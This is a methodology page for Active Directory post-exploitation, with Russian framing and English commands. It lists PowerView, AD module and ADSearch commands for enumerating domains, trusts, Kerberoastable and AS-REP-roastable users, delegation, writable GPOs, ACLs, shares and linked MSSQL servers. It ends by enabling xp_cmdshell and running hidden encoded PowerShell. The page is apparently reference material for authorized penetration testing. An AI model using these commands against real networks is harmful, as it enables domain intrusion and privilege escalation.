Active Directory (пост‑экс.)

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

Зафиксируйте роль в домене и допустимые техники (read‑only / согласованная эксплуатация).
Соберите данные для картирования атаки (учётки, делегирование, доверия).
Двигайтесь по сценариям раздела с планом отката и контролем DC.
Команды и инструменты в блоках кода — на английском.

Методика

Domain

General Information

Get-Domain [-Domain <DIFFERENT_DOMAIN>]

Get-ADDomain [-Identity <DOMAIN>]

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 

Get-ADDomainController [-DomainName <DOMAIN>] [-Discover]

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 

Forest

Get-Forest [-Forest <FOREST>]

Get-ADForest [-Identity <FOREST>]

Get-ForestDomain [-Forest <FOREST>]

Get-ADForest [-Identity <FOREST>] | fl Domains

Get-ForestGlobalCatalog [-Forest <FOREST>]

Get-ADForest | select -ExpandProperty GlobalCatalogs

Trust

Get-DomainTrust [-Domain <DomainName>]

Get-ADTrust {-Filter * | -Identity "<Domain>"}

nltest /domain_trusts

Get-DomainTrustMapping

Get-ForestTrust [-Forest <"FOREST>"]

Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

Users

General Information

Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname

Get-ADUser -Filter * | ?{ $_.Enabled -eq "true" }  Select SamAccountName
# Detailed information about a user
Get-ADUser -Identity <USERNAME> -Properties *

.\ADSearch.exe --search "objectCategory=user"

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description

Get-DomainGroup -UserName "<USERNAME>"

Get-ADPrincipalGroupMembership -Identity "<USERNAME>"

Get-ADUser -Filter * -Properties * | select name ,logoncount ,@{expression={[datetime]::fromFileTime($_pwdlastset)}}

Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]

Security

Get-DomainUser -SPN | select serviceprincipalname

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

.\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

Get-DomainUser -PreauthNotRequired -Verbose

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True } -Properties DoesNotRequirePreAuth | select UserPrincipalName

Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description

Find-LocalAdminAccess

Get-NetUser -TrustedToAuth

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

 .\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Groups

Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]

Get-ADGroup -Filter * | select name
# More detailed version
Get-ADGroup -Filter * -Properties *

# Admin Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))" [--attributes cn,member]
# MSSQL Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member

Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]	

Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object SamAccountName

Get-ADPrincipalGroupMembership <USER>

Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Computers

General information

Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"

# Get Name, IP and Operating System
Get-NetComputer  -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_  } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize

Get-AdComputer -Filter * | select Name

Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime} 

Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username

Get-LoggedonLocal -ComputerName "<HOSTNAME>"

Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"

Get-LastLoggedOn -ComputerName <HOSTNAME>

Security

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity |  Format-List}}

Get-DomainComputer -UnConstrained | select samaccountname

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

.\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname

Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl

Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl

Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

.\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Group Policies Objects (GPO)s

General information

Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName

Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"

Get Modifiable GPOs

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Organizational Units (OU)

Get-DomainOU [-Properties Name | sort -Property Name]

Get-ADOrganizationalUnit -Filter * -Properties *

Get-DomainGPO -Identity "<GPLink_RelativeCN>"

Access Control Lists (ACL)s

Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs

Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"

(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=cs,DC=org').Access

Find-InterestingDomainAcl -ResolveGUIDs

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Find-DomainShare
# Enumerate the Domain Shares the current user has access
Find-DomainShare -CheckShareAccess

Find-DomainShare -CheckShareAccess

Invoke-ShareFinder -Verbose

Get-NetFileServer

Invoke-FileFinder -Verbose

MSSQL

General information

Get-SQLInstanceDomain

Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances use the following oneline
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"

Links

Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>"

select * from master..sysservers

Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>"

Perform Queries

Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

CMDShell

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'

sp_configure 'Show Advanced Options', 1; RECONFIGURE;sp_configure 'xp_cmdshell', 1; RECONFIGURE;

"EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';

Порядок действий​

Методика​

Domain​

General Information​

Forest​

Trust​

Users​

General Information​

Security​

Groups​

Computers​

General information​

Security​

Group Policies Objects (GPO)s​

General information​

Get Modifiable GPOs​

Organizational Units (OU)​

Access Control Lists (ACL)s​

Shares​

MSSQL​

General information​

Links​

Perform Queries​

CMDShell​

Ссылки​

Порядок действий

Методика

Domain

General Information

Forest

Trust

Users

General Information

Security

Groups

Computers

General information

Security

Group Policies Objects (GPO)s

General information

Get Modifiable GPOs

Organizational Units (OU)

Access Control Lists (ACL)s

Shares

MSSQL

General information

Links

Perform Queries

CMDShell

Ссылки